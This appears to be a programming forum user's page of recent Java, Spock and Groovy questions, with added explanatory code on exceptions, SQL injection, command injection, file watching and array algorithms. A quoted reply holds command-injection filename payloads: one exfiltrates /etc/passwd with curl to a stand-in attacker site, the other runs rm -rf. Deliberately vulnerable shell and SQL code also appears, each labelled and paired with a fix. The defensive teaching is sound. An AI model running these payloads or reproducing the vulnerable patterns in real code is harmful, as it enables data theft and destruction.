Lisa Austin

Ranch Hand
since Jun 04, 2015

Recent posts by Lisa Austin

Campbell Ritchie wrote:
Yes; it's good to see you back


Thank you very much, Ritchie, for the advice. I do not know why I was completely blind to the fact that I was extending Throwable vs. what the instructor was doing. Great information as always. You have always been a great instructor and I'm lucky there are people like you out there to help people like me.
7 months ago
Hi there! It's been a while.

Could someone please explain to me why my Intellij IDE flagged what I did as an error when I was copying what the instructor did in her own code?


I'm trying to learn Spock and I'm following a YouTube video here: https://www.youtube.com/watch?v=i5Qu3qYOfsM

She provides her whole code set in git, but I'm following along writing the code out myself and only using her code in case I get stuck.

In the video the instructor has a class "Polygon" and a "TooFewSidesException" class under package com.mechanitis.demo.spock.

Her Polygon constructor has the "throw new TooFewSidesException". Full code is after my question, but this is a snippet of what I'm talking about.




My IntelliJ didn't like it when I followed her example (didn't like = red light bulb and squiggly line). I took its suggestion and it added "throws TooFewSidesException" to the constructor. Any idea why my IntelliJ insists on the method having "throws TooFewSidesException" when her code is just fine without it?

My Java is 11 (11.0.6_10) and hers is 11.0.9, if that makes a difference. Thank you!










Instructor's Polygon class.








Instructor's TooFewSidesException class






MY Polygon Class





MY TooFewSidesException class ( just a start )


7 months ago
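The compiler behaviour asked about above comes down to checked versus unchecked exceptions, not the patch level of Java 11. The following is an added example, not the instructor's code from the video and not the poster's own classes; the class names are made up for the demo, and it assumes (as the poster's later reply suggests) that one version of the exception extends Throwable directly while the instructor's extends RuntimeException.

```java
// Added example (not the instructor's code from the video). Names are made up for
// the demo. Shows why a constructor that throws a direct subclass of Throwable
// must declare "throws", while a subclass of RuntimeException does not.
public class SidesDemo {
    private final int sides;

    // javac rejects this constructor without the throws clause:
    // "unreported exception CheckedSidesException; must be caught or declared to be thrown"
    SidesDemo(int sides) throws CheckedSidesException {
        if (sides < 3) {
            throw new CheckedSidesException("a polygon needs at least 3 sides, got " + sides);
        }
        this.sides = sides;
    }

    // The same validation with the unchecked type compiles with no throws clause.
    static int requireAtLeastThreeSides(int sides) {
        if (sides < 3) {
            throw new UncheckedSidesException("a polygon needs at least 3 sides, got " + sides);
        }
        return sides;
    }

    int sides() { return sides; }

    public static void main(String[] args) {
        try {
            new SidesDemo(2);                       // caller is forced to handle it
        } catch (CheckedSidesException e) {
            System.out.println("checked:   " + e.getMessage());
        }
        try {
            requireAtLeastThreeSides(2);            // this try is optional; it compiles without it
        } catch (UncheckedSidesException e) {
            System.out.println("unchecked: " + e.getMessage());
        }
    }
}

// Checked: anything that extends Throwable is checked unless it also descends
// from RuntimeException or Error, so the compiler enforces catch-or-declare.
class CheckedSidesException extends Throwable {
    CheckedSidesException(String message) { super(message); }
}

// Unchecked: RuntimeException and its subclasses may propagate undeclared.
class UncheckedSidesException extends RuntimeException {
    UncheckedSidesException(String message) { super(message); }
}
```

Run it as a single-file program with `java SidesDemo.java` on Java 11. Remove the `throws CheckedSidesException` clause from the constructor and the file no longer compiles, which is exactly the red squiggle IntelliJ showed; switch the superclass to RuntimeException and the clause becomes unnecessary. The rule has been the same since Java 1.0, so 11.0.6 versus 11.0.9 is not the difference. When the exception guards input validation, an unchecked type is the usual choice: a caller cannot accidentally swallow it by forgetting a catch, and bad input fails loudly instead of silently.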

Matthew Bendford wrote: Another common type of attack vector should also get mentioned: SQL injection.
It's pretty much the same idea: unfortunately many beginner-level tutorials, teachers and books commonly use simple string concatenation to piece together SQL queries. This works with provided sample data but already breaks on something as common as a forum. The English language commonly uses both types of quote marks: the single quote ' and the double quote ". If you now try to store this very line in a database, one of them is used as the delimiter character, and when encountered unexpectedly it means end of input string, which corrupts the SQL query; the best case is an error returned from the database.
If you manipulate an input to a vulnerable query in a specific way you can get any sort of result, from wiping the database to free access to leak its content.
So to get around this you have to sanitize the user input and properly build your query. One part of it is to use PreparedStatements. The query is done with placeholder characters (usually the question mark ?) and the values are filled in with setters. This is also a way of type safety: if you expect a numerical value but you get a letter or other symbol, the setter already fails fast while building the SQL query, before anything is ever sent to the database.
An additional way of user input sanitization is to limit the input characters. For a name there's a reason for a single dash, but a double dash -- (the SQL comment marker to ignore the rest of the query string) doesn't make sense. This can be a simple typo, but can also be an attacker trying to forge a bad query. You should reject such a name even before building the query, as the input already looks too suspicious.
This list goes on for quite some lines. Attackers found all kinds of crazy issues over the decades, like what's called a reverse shell abusing a bug in the Apache web server or the recent log4j (which I became a victim of). The overall gist is: NEVER trust the user input. Always pre-check, validate and sanitize it, and don't use simple string concatenation if other methods are available, like varargs methods for executing sub-processes, prepared statements for SQL, or simple I/O like a file by using a language's internal API rather than relying on a potentially flawed shell command.



Thank you! Yes, this was in another of their lessons. Thank you though for this info.
1 year ago
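The reply above describes three defences in prose: a fixed query with `?` placeholders, fail-fast typing through the setters, and rejecting input that already looks wrong (the `--` marker in a name). The block below is an added example that is not part of the original thread or the training material; the table and column names, the name pattern and the sample inputs are all assumed for the demo. It takes a `java.sql.Connection` as a parameter so it compiles against plain JDBC without a specific driver.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

public class UserLookup {

    // VULNERABLE: the user-controlled value becomes part of the SQL text, so a
    // single quote in the name changes the structure of the statement.
    static String unsafeQuery(String name) {
        return "SELECT id, name FROM users WHERE name = '" + name + "'";
    }

    // Pre-validation as the reply suggests. The pattern is an assumption for this
    // demo: letters, space, dot, apostrophe and a single dash, at most 64 chars.
    private static final Pattern NAME = Pattern.compile("^[\\p{L} .'-]{1,64}$");

    static boolean looksLikeName(String name) {
        return name != null && NAME.matcher(name).matches() && !name.contains("--");
    }

    // SAFE: the query text is fixed; the value travels as a bound parameter and is
    // never parsed as SQL, so O'Brien works and "x'; DROP TABLE ..." is just a string.
    static List<String> findUsers(Connection conn, String name) throws SQLException {
        if (!looksLikeName(name)) {
            throw new IllegalArgumentException("rejected name: " + name);
        }
        String sql = "SELECT id, name FROM users WHERE name = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, name);
            try (ResultSet rs = ps.executeQuery()) {
                List<String> out = new ArrayList<>();
                while (rs.next()) {
                    out.add(rs.getInt("id") + ":" + rs.getString("name"));
                }
                return out;
            }
        }
    }

    // Type safety: setInt needs an int, so a value like "42 OR 1=1" fails in
    // Integer.parseInt inside the application, before anything reaches the database.
    static String findNameById(Connection conn, String rawId) throws SQLException {
        int id = Integer.parseInt(rawId.trim());
        try (PreparedStatement ps = conn.prepareStatement("SELECT name FROM users WHERE id = ?")) {
            ps.setInt(1, id);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getString("name") : null;
            }
        }
    }

    public static void main(String[] args) {
        // Constructed inputs for the demo: a plain name, a legitimate apostrophe,
        // and an injection attempt using the comment marker from the reply.
        String[] inputs = { "Alice", "O'Brien", "x'; DROP TABLE users; --" };
        for (String in : inputs) {
            System.out.println("input        : " + in);
            System.out.println("concatenated : " + unsafeQuery(in));
            System.out.println("accepted     : " + looksLikeName(in));
            System.out.println();
        }
    }
}
```

`main` only exercises the string-building and validation paths, which need no database; point `findUsers` and `findNameById` at any JDBC connection to see the parameterised queries run. Note the order of the defences: the allow-list rejects the obviously hostile input early, but the prepared statement is what actually prevents injection, so a name that passes validation (O'Brien) is still safe only because it is bound as a parameter rather than concatenated.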

Ron McLeod wrote:
I'm not sure if this helps, but the approach above is vulnerable to command injection if the username or filename originated from an untrusted and unsanitized source.  Data could be exfiltrated using a file name like:
   "my-file; cat /etc/passwd | curl -X POST https://attackersite.com --data @-"

or data deleted with a filename like:
   "my-file; rm -rf /path/to/valuable/stuff"

since you are passing a raw command string to the OS shell to process.




Thank you!! That did help. I was completely focused on something else and got it. But yes!! I put the filename in an ArrayList and then created a file using a boolean method. I just needed to focus on the file and user. SMH. I get so stuck sometimes on a certain idea.
1 year ago
I'm going through some training as a requirement for my company and there are two sections that just have me stumped. This one I've tried and tried to figure out but I don't get it.
It says



The two common ways to directly protect against command injection:

If available, use parameterized functions that enforce the separation between arguments and the command such as a write() function instead of eval, process, shell_exec, or system. This is the best way to protect against command injection.

You can use a regular expression library of the specific language to filter out dangerous OS injection syntax, but this is hard to do correctly and not recommended.

The best method to prevent command injection vulnerabilities is to use parameterized functions. In the case of writing a file, instead of writing via OS commands (e.g. touch) you can use the language's native write functionality.

Examples in different languages are below.




Example for Java is











This is confusing me.

Touch is usually for files, not directories, I thought, but "tmp/" looks like a directory, so I assume that I'm "touch"ing the filename (creating a new file under an existing directory tmp/username/filename).

createNewFile() is a boolean, so I'm not really sure how to use this in the p = Runtime.getRuntime().exec() or whether I should keep that at all. My ASSUMPTION is that if the file "filename" is created successfully by using new File(), then I would use Runtime.getRuntime().exec() to execute the createNewFile(), but that doesn't make sense.




Any hint would be appreciated.  I've failed this about 25 times now LOL.

1 year ago
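Ron McLeod's reply to this question shows the payloads; the training text describes the fix in prose. The block below is an added example that is not the training's own Java sample (which is not reproduced on this page) and not the poster's solution. It puts the vulnerable pattern, a shell command built from `username` and `filename`, next to the parameterised alternative the training recommends: the language's own file API, with the two inputs validated as single path segments and the resolved path checked to stay under the base directory. The base directory `tmp` under the working directory, the segment pattern and the sample inputs are assumptions for the demo.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.regex.Pattern;

public class SafeFileCreate {

    // VULNERABLE: the whole line is handed to a shell, so a ';' in the filename
    // terminates the touch command and starts a second one of the attacker's choosing.
    static Process touchViaShell(String username, String filename) throws IOException {
        String cmd = "touch tmp/" + username + "/" + filename;
        return new ProcessBuilder("sh", "-c", cmd).start();
    }

    // Assumed base directory for the demo: ./tmp
    private static final Path BASE = Paths.get("tmp").toAbsolutePath().normalize();
    // Assumed allow-list: one plain path segment, no separators, no shell metacharacters.
    private static final Pattern SEGMENT = Pattern.compile("^[A-Za-z0-9._-]{1,64}$");

    static boolean isPlainSegment(String s) {
        return s != null && SEGMENT.matcher(s).matches() && !s.equals(".") && !s.equals("..");
    }

    // SAFE: the file API treats the name as data, never as a command. The
    // startsWith check is a second line of defence against traversal.
    static Path createFile(String username, String filename) throws IOException {
        if (!isPlainSegment(username) || !isPlainSegment(filename)) {
            throw new IllegalArgumentException("invalid path segment");
        }
        Path target = BASE.resolve(username).resolve(filename).normalize();
        if (!target.startsWith(BASE)) {
            throw new IllegalArgumentException("path escapes base directory");
        }
        Files.createDirectories(target.getParent());
        // Files.createFile fails with FileAlreadyExistsException instead of
        // returning the boolean that File.createNewFile() gives you.
        return Files.createFile(target);
    }

    public static void main(String[] args) {
        // Constructed inputs: a normal name, the deletion payload from the reply,
        // and a traversal attempt.
        String[][] inputs = {
            { "alice", "notes.txt" },
            { "alice", "my-file; rm -rf /path/to/valuable/stuff" },
            { "../../etc", "cron.d" },
        };
        for (String[] in : inputs) {
            try {
                System.out.println("created  " + createFile(in[0], in[1]));
            } catch (IllegalArgumentException e) {
                System.out.println("rejected " + in[1] + ": " + e.getMessage());
            } catch (IOException e) {
                System.out.println("io error " + in[1] + ": " + e);
            }
        }
    }
}
```

Two caveats worth knowing. `Runtime.exec(String)` splits its argument on whitespace and runs the first token directly, without a shell, so the `;` trick only works when the code routes the string through `sh -c` (or `cmd /c`) as `touchViaShell` does; even then, a filename with spaces or `../` remains a problem, which is why the file API plus validation is the right fix rather than just avoiding the shell. And `File.createNewFile()` answering the question above returns `true` when it created the file and `false` when the file already existed; `Files.createFile` expresses the same outcome as an exception, which is harder to ignore.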
In the Oracle tutorials (https://docs.oracle.com/javase/tutorial/essential/io/notification.html) the example they use here uses the for loop without any values? I get that it normally is

for (initialization; termination;
    increment) {
   statement(s)
}


So am I correct in thinking this creates a never-ending loop?

My other question is about the WatchKey. Here I see it get initialized twice, first at line 5, then at 19. I'm trying to picture what this looks like to understand it. Is the key at 5 and 19 two separate objects?

1 year ago
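Both questions in the post above can be answered by running a small watcher. The block below is an added example, not the Oracle tutorial's code: it registers one directory, loops with `for (;;)`, and prints whether the key handed back by the watch service is the same object as the one returned by `register`. The 10-second idle timeout and the directory argument are choices for the demo.

```java
import java.io.IOException;
import java.nio.file.FileSystems;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.nio.file.StandardWatchEventKinds;
import java.nio.file.WatchEvent;
import java.nio.file.WatchKey;
import java.nio.file.WatchService;
import java.util.concurrent.TimeUnit;

public class DirWatcher {

    public static void main(String[] args) throws IOException, InterruptedException {
        Path dir = Paths.get(args.length > 0 ? args[0] : ".").toAbsolutePath().normalize();
        WatchService watcher = FileSystems.getDefault().newWatchService();

        // First WatchKey: the registration token for this one directory.
        WatchKey registration = dir.register(watcher,
                StandardWatchEventKinds.ENTRY_CREATE,
                StandardWatchEventKinds.ENTRY_DELETE,
                StandardWatchEventKinds.ENTRY_MODIFY);
        System.out.println("watching " + dir);

        // for (;;) has no initialisation, condition or increment: it is an infinite
        // loop, and the only ways out are the two break statements below.
        for (;;) {
            // Second WatchKey: whichever registered key has events queued. With a
            // single registration it is the very same object as "registration".
            WatchKey key = watcher.poll(10, TimeUnit.SECONDS);
            if (key == null) {
                System.out.println("no events for 10s, stopping");
                break;
            }
            System.out.println("same object as the registration key? " + (key == registration));

            for (WatchEvent<?> event : key.pollEvents()) {
                if (event.kind() == StandardWatchEventKinds.OVERFLOW) {
                    continue;           // events were lost; rescan if that matters to you
                }
                Path name = (Path) event.context();      // file name relative to dir
                System.out.println(event.kind().name() + ": " + dir.resolve(name));
            }

            // reset() re-arms the key; false means the directory is no longer accessible.
            if (!key.reset()) {
                System.out.println("directory gone, stopping");
                break;
            }
        }
        watcher.close();
    }
}
```

Run `java DirWatcher.java /some/dir`, then create or edit a file in that directory from another terminal. The tutorial's version uses `watcher.take()`, which blocks forever; `poll` with a timeout is used here so the demo exits on its own. A point that matters when a watcher feeds a security control: the event carries only a name, and by the time you act on it the file may have been replaced or removed, so resolve the path and check it again (exists, is a regular file, is under the expected directory) before reading or executing anything.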
So I think I may have figured out how to use the find{} with this. Thank you
3 years ago
I'm trying to learn Groovy and Spock. I'm wondering if someone could help me with this?

I have a list of maps with key "color" and want to verify each map's value individually.




The key "KeyID" is unique, whereas all other keys can have duplicate values. When a value is always the same I have used "every{}" to verify the value for a key. For example, the value for the key "load" is always 9999.
But what I can't figure out is when the value can be different for a key. I am wondering if there is a way to reference / filter on the unique value of KeyID first, THEN verify the other key for each map?


3 years ago
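The post above asks for Groovy's `every{}` (one value for all rows) and `find{}` (locate a row by its unique KeyID, then check another key). The block below is an added example in Java streams rather than Groovy, since Java is the language of the rest of this page; it is not the poster's Spock code. The sample rows, the expected colours and the `KeyID`/`color`/`load` keys are constructed for the demo, mirroring the key names mentioned in the post. It goes slightly beyond the question by collecting every mismatch and flagging a duplicate KeyID, which is what you want a test to report.

```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.Optional;

public class RowChecks {

    // Groovy every{} equivalent: does every row carry the same "load"?
    static boolean everyLoadIs(List<Map<String, Object>> rows, int load) {
        return rows.stream().allMatch(r -> Integer.valueOf(load).equals(r.get("load")));
    }

    // Groovy find{} equivalent: the row whose unique KeyID matches.
    static Optional<Map<String, Object>> findByKeyId(List<Map<String, Object>> rows, int keyId) {
        return rows.stream()
                .filter(r -> Integer.valueOf(keyId).equals(r.get("KeyID")))
                .findFirst();
    }

    // Per-KeyID check of "color". Returns every problem found so a test can assert
    // the list is empty and still see all failures at once. Also flags KeyIDs that
    // occur more than once, since the post says KeyID is unique.
    static List<String> colorMismatches(List<Map<String, Object>> rows,
                                        Map<Integer, String> expectedColor) {
        List<String> problems = new ArrayList<>();

        Map<Object, Integer> seen = new HashMap<>();
        for (Map<String, Object> r : rows) {
            seen.merge(r.get("KeyID"), 1, Integer::sum);
        }
        seen.forEach((id, n) -> {
            if (n > 1) problems.add("KeyID " + id + " appears " + n + " times");
        });

        expectedColor.forEach((id, color) -> {
            Optional<Map<String, Object>> row = findByKeyId(rows, id);
            if (row.isEmpty()) {
                problems.add("KeyID " + id + " missing");
            } else if (!color.equals(row.get().get("color"))) {
                problems.add("KeyID " + id + ": expected " + color + " but was " + row.get().get("color"));
            }
        });
        return problems;
    }

    public static void main(String[] args) {
        // Constructed sample data for the demo.
        List<Map<String, Object>> rows = List.of(
            Map.of("KeyID", 1, "color", "red",   "load", 9999),
            Map.of("KeyID", 2, "color", "blue",  "load", 9999),
            Map.of("KeyID", 3, "color", "green", "load", 9999));
        Map<Integer, String> expected = Map.of(1, "red", 2, "blue", 3, "yellow");

        System.out.println("every load is 9999: " + everyLoadIs(rows, 9999));
        System.out.println("row with KeyID 2:   " + findByKeyId(rows, 2).orElse(null));
        System.out.println("problems:           " + colorMismatches(rows, expected));
    }
}
```

In a Spock `then:` block the same idea is `rows.every { it.load == 9999 }` for the first method and `rows.find { it.KeyID == 2 }.color == 'blue'` for the second; the Java version above is the equivalent for a plain JUnit test. Note that `findFirst()` silently hides a duplicate KeyID, which is why the duplicate check is done separately.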

Zachary Griggs wrote: I compile all my projects in 1.8. Example:

This should work with Java 8. If this is the way your pom is currently setup, then you probably just need to download the SDK.

Locally:
File -> Project Structure -> Project SDK
If the SDK version isn't compatible with java 1.8, you'll see a lot of errors

You should be able to use Java 1.8 with Amazon Corretto Java 8. That would be a change on the machine to install that SDK and use it, probably. I'd imagine it would be on some sort of build server. Do you use Jenkins?



Thank you. I was just confused, I think, by what was being asked by my mentor. Things seem like they should be simple, but if it's too simple it seems wrong. LOL. Thanks for confirming for me.
3 years ago
I hope Beginning Java is okay for this question. I'm trying to learn Spring and Spring Boot. I have a mentor who has me learning by working on a small project, and one task I was given has confused me, but I won't meet with him until Friday. I can email, but I just want to run this by someone before I bring it up to him, because I think I may have missed something.

I need to change the application's Java version from 1.8 to Amazon Corretto 8.
Maven currently has the maven-compiler-plugin configuration set with source = 1.8 and target = 1.8.

When I was Googling for information about this, it looks like this is just set in the project's IDE, or I guess the machine it's being built on? So it's not a POM change?

https://unix.stackexchange.com/questions/548172/maven-compiler-version-for-amazon-corretto





3 years ago
Thanks guys.  I'll give it a go from this.
3 years ago
I'm on another Codewars problem here: https://www.codewars.com/kata/54521e9ec8e60bc4de000d6c/train/java

The problem is to find the subset of continuous values which adds up to the highest value. The example here is



So the values 4, -1, 2, 1 add up to the highest value, which is 6.
If the int array is all positive, then just add up the entire array.
If all negative values, then return 0.
If it's an empty array, return 0.


I think I understand an all-positive array, an all-negative one and an empty one. I figure I would iterate over and test the values as to whether they are all over 0, all under 0 or empty, but if there is a mix of values I'm a bit stumped as to what the best solution is.


I keep thinking of ways that I may be able to solve this when there is a combination of both positive and negative numbers, but most of them seem complicated and most likely NOT the correct way. Are there any tips someone can give me as to what may be the best solution?

On paper I can come up with a few ideas, but none seem ideal, or when I test the idea I see an issue with it.











3 years ago
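The mixed-sign case asked about above does not need to be split from the all-positive, all-negative and empty cases: one linear pass (Kadane's algorithm) handles all four, because the rules "all negative returns 0" and "empty returns 0" are the same rule, namely that taking nothing scores 0. The block below is an added example, not the poster's attempt or the kata's reference solution; the input array in `main` is constructed to match the run 4, -1, 2, 1 mentioned in the post. The second method goes a step beyond the question and reports which slice produced the sum.

```java
import java.util.Arrays;

public class MaxSequence {

    // Kadane's algorithm. bestEndingHere is the largest sum of a run that ends at
    // the current index. Once it drops below zero, any run continuing from here is
    // worse than a fresh run starting at the next index, so it resets to 0.
    // Empty and all-negative input return 0: "take nothing" is the best option.
    static int maxSequence(int[] arr) {
        int bestEndingHere = 0, best = 0;
        for (int x : arr) {
            bestEndingHere = Math.max(0, bestEndingHere + x);
            best = Math.max(best, bestEndingHere);
        }
        return best;
    }

    // Same single pass, also tracking where the winning run is.
    // Returns {sum, start, end} with end exclusive; {0, 0, 0} when nothing positive exists.
    static int[] maxSlice(int[] arr) {
        int best = 0, bestStart = 0, bestEnd = 0;
        int running = 0, runStart = 0;
        for (int i = 0; i < arr.length; i++) {
            if (running <= 0) {          // a fresh run from i beats carrying a non-positive prefix
                running = 0;
                runStart = i;
            }
            running += arr[i];
            if (running > best) {
                best = running;
                bestStart = runStart;
                bestEnd = i + 1;
            }
        }
        return new int[] { best, bestStart, bestEnd };
    }

    public static void main(String[] args) {
        // Constructed inputs: mixed signs (contains the run 4, -1, 2, 1), all positive,
        // all negative, and empty.
        int[][] samples = {
            { -2, 1, -3, 4, -1, 2, 1, -5, 4 },
            { 1, 2, 3 },
            { -3, -1, -2 },
            { }
        };
        for (int[] s : samples) {
            int[] slice = maxSlice(s);
            System.out.println(Arrays.toString(s)
                    + " -> " + maxSequence(s)
                    + " from " + Arrays.toString(Arrays.copyOfRange(s, slice[1], slice[2])));
        }
    }
}
```

For the first sample the answer is 6 from the slice 4, -1, 2, 1; the second sums the whole array; the last two give 0 with an empty slice. The reason the per-case iteration described in the post is unnecessary is visible in `maxSequence`: an all-positive array simply never resets, and an all-negative array resets at every step, so `best` stays at its initial 0.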

Junilu Lacar wrote:Line 13 accesses the parameter b directly and since Arrays.sort() does so in place, the array in the calling code will experience the side effect of being sorted after the call is made. That is, if the array b is unsorted before the call to comp(), it will be sorted after. That's kind of a no-no since it's a side-effect that you wouldn't normally expect to happen nor necessarily want to happen.



So to not access the parameter b directly, then I need to create a new int[] array and assign it the value of b before sorting?
3 years ago

Junilu Lacar wrote:

Lisa Austin wrote: I was thinking mine maybe better because I'm checking for more than just null arrays?


Your code actually gives incorrect results per this requirement: "If a or b are nil (or null or None), the problem doesn't make sense so return false."

Your code will return true if a and b are null.



Interesting. I didn't catch that requirement AND I passed all the tests. I probably should report it to CodeWars. Thank you for pointing it out to me.
3 years ago

Campbell Ritchie wrote:Isn't it a quicksort for an int[]? In which case wouldn't the memory requirement be the same as that for the original array?
I think trying to find whether two arrays are anagrams of each other can readily be done by sorting. Probably a simpler and therefore less error‑prone solution than some others. What solutions did other people propose themselves?



My solution (but slightly different) was voted as best practice, but the discussion about how sorting isn't cheap was under it. Then it was discussed under the second-most "Best Practice", with a suggestion to use a HashMap or a non-comparative sort such as Radix Sort.

What do you think of my solution vs. the first-place "Best Practice"? It's similar, I know, so maybe not much can be said. I was thinking mine may be better because I'm checking for more than just null arrays?




This was voted second as "Best Practices" but with a lot of disagreements as well.

3 years ago
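The three posts above in this thread raise three separate points about the `comp(a, b)` solutions: `Arrays.sort()` on a parameter sorts the caller's array as a side effect, a null `a` or `b` must return false, and sorting is not the only option since a HashMap count avoids the comparison sort. The block below is an added example, not any of the Codewars solutions discussed (which are not reproduced on this page); it implements the "are these two int arrays anagrams of each other" check that Campbell Ritchie describes, once by sorting defensive copies and once by counting, with the null rule applied in both. The sample arrays in `main` are constructed for the demo.

```java
import java.util.Arrays;
import java.util.HashMap;
import java.util.Map;

public class ArrayAnagram {

    // Sorting approach, O(n log n). The inputs are cloned first so the caller's
    // arrays are not reordered behind its back (the side effect pointed out above).
    static boolean compBySorting(int[] a, int[] b) {
        if (a == null || b == null) return false;   // the problem makes no sense, per the kata
        if (a.length != b.length) return false;
        int[] sa = a.clone();                       // defensive copies
        int[] sb = b.clone();
        Arrays.sort(sa);
        Arrays.sort(sb);
        return Arrays.equals(sa, sb);
    }

    // Counting approach, O(n) time and O(k) space for k distinct values. No sort,
    // and the inputs are only read.
    static boolean compByCounting(int[] a, int[] b) {
        if (a == null || b == null) return false;
        if (a.length != b.length) return false;
        Map<Integer, Integer> counts = new HashMap<>();
        for (int x : a) {
            counts.merge(x, 1, Integer::sum);
        }
        for (int x : b) {
            Integer c = counts.get(x);
            if (c == null) return false;            // b has a value a does not
            if (c == 1) counts.remove(x); else counts.put(x, c - 1);
        }
        return counts.isEmpty();                    // every count came back to zero
    }

    public static void main(String[] args) {
        int[] a = { 3, 1, 2, 1 };
        int[] b = { 1, 2, 1, 3 };
        int[] bBefore = b.clone();

        System.out.println("sorting:  " + compBySorting(a, b));
        System.out.println("b unchanged after the call: " + Arrays.equals(b, bBefore));
        System.out.println("counting: " + compByCounting(a, b));
        System.out.println("different multiset: " + compByCounting(a, new int[] { 1, 2, 3, 3 }));
        System.out.println("null input: " + compBySorting(null, b) + " " + compByCounting(a, null));
        System.out.println("two empties: " + compBySorting(new int[0], new int[0]));
    }
}
```

The `b unchanged` line is the check for the side effect Junilu Lacar describes: drop the two `clone()` calls and it prints false. On the cost question, the counting version avoids the sort entirely and is the usual choice for large arrays; for the small inputs in a kata either is fine, and the sorting version is shorter and harder to get wrong, which is the trade-off the thread is discussing.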